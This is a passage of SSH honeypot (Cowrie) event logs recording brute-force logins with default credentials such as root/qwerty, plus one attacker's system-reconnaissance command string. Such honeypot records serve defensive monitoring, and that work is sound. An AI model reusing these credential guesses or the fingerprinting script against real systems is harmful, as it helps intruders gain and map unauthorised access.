hacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:55:20.255212Z","src_ip":"212.227.235.229","session":"90fa9d456c29"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:55:21.103765Z","src_ip":"212.227.235.229","session":"90fa9d456c29"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:21.311377Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:21.312193Z","src_ip":"212.227.235.229","session":"90fa9d456c29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59032,"dst_ip":"1.2.3.4","dst_port":22,"session":"a243b8f33fa8","protocol":"ssh","message":"New connection: 212.227.125.160:59032 (1.2.3.4:22) [session: a243b8f33fa8]","sensor":"my-vps","timestamp":"2025-08-26T11:55:24.699190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:24.710414Z","src_ip":"212.227.125.160","session":"a243b8f33fa8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:24.751599Z","src_ip":"212.227.125.160","session":"a243b8f33fa8"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"ansible","message":"login attempt [ansible/ansible] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:24.971519Z","src_ip":"212.227.125.160","session":"a243b8f33fa8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:26.291617Z","src_ip":"212.227.125.160","session":"a243b8f33fa8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41016,"dst_ip":"1.2.3.4","dst_port":22,"session":"c73f0507056c","protocol":"ssh","message":"New connection: 212.227.125.160:41016 (1.2.3.4:22) [session: c73f0507056c]","sensor":"my-vps","timestamp":"2025-08-26T11:55:28.242985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:28.378149Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:55:28.378910Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:55:28.999371Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:55:29.378081Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.379268Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.379877Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.380814Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.382902Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.383622Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.384386Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.385676Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.386483Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.387425Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.388283Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.389310Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.389854Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.506279Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.507235Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:29.547876Z","src_ip":"212.227.125.160","session":"c73f0507056c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59802,"dst_ip":"1.2.3.4","dst_port":22,"session":"0144d6a96847","protocol":"ssh","message":"New connection: 212.227.125.160:59802 (1.2.3.4:22) [session: 0144d6a96847]","sensor":"my-vps","timestamp":"2025-08-26T11:55:30.638096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:30.790627Z","src_ip":"212.227.125.160","session":"0144d6a96847"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:30.791803Z","src_ip":"212.227.125.160","session":"0144d6a96847"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50210,"dst_ip":"1.2.3.4","dst_port":22,"session":"b82414021c8d","protocol":"ssh","message":"New connection: 217.72.205.35:50210 (1.2.3.4:22) [session: b82414021c8d]","sensor":"my-vps","timestamp":"2025-08-26T11:55:30.899595Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:30.900911Z","src_ip":"217.72.205.35","session":"b82414021c8d"}
{"eventid":"cowrie.login.failed","username":"default","password":"default","message":"login attempt [default/default] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:31.454001Z","src_ip":"212.227.125.160","session":"0144d6a96847"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35354,"dst_ip":"1.2.3.4","dst_port":22,"session":"88d877d1e806","protocol":"ssh","message":"New connection: 83.168.105.65:35354 (1.2.3.4:22) [session: 88d877d1e806]","sensor":"my-vps","timestamp":"2025-08-26T11:55:31.861322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:31.862261Z","src_ip":"83.168.105.65","session":"88d877d1e806"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:31.899236Z","src_ip":"83.168.105.65","session":"88d877d1e806"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:32.008605Z","src_ip":"83.168.105.65","session":"88d877d1e806"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:32.507579Z","src_ip":"212.227.125.160","session":"0144d6a96847"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:33.046071Z","src_ip":"83.168.105.65","session":"88d877d1e806"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60568,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d3432e99ec2","protocol":"ssh","message":"New connection: 212.227.125.160:60568 (1.2.3.4:22) [session: 4d3432e99ec2]","sensor":"my-vps","timestamp":"2025-08-26T11:55:36.412624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:36.422114Z","src_ip":"212.227.125.160","session":"4d3432e99ec2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:36.474690Z","src_ip":"212.227.125.160","session":"4d3432e99ec2"}
{"eventid":"cowrie.login.failed","username":"cloud-user","password":"cloud-user","message":"login attempt [cloud-user/cloud-user] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:36.978806Z","src_ip":"212.227.125.160","session":"4d3432e99ec2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:38.527808Z","src_ip":"212.227.125.160","session":"4d3432e99ec2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33104,"dst_ip":"1.2.3.4","dst_port":22,"session":"691ba707e1b8","protocol":"ssh","message":"New connection: 212.227.125.160:33104 (1.2.3.4:22) [session: 691ba707e1b8]","sensor":"my-vps","timestamp":"2025-08-26T11:55:42.245681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:42.246507Z","src_ip":"212.227.125.160","session":"691ba707e1b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:42.297029Z","src_ip":"212.227.125.160","session":"691ba707e1b8"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:42.566318Z","src_ip":"212.227.125.160","session":"691ba707e1b8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:43.619875Z","src_ip":"212.227.125.160","session":"691ba707e1b8"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37704,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4a722be7d3d","protocol":"ssh","message":"New connection: 83.168.105.65:37704 (1.2.3.4:22) [session: f4a722be7d3d]","sensor":"my-vps","timestamp":"2025-08-26T11:55:47.351202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:47.352137Z","src_ip":"83.168.105.65","session":"f4a722be7d3d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"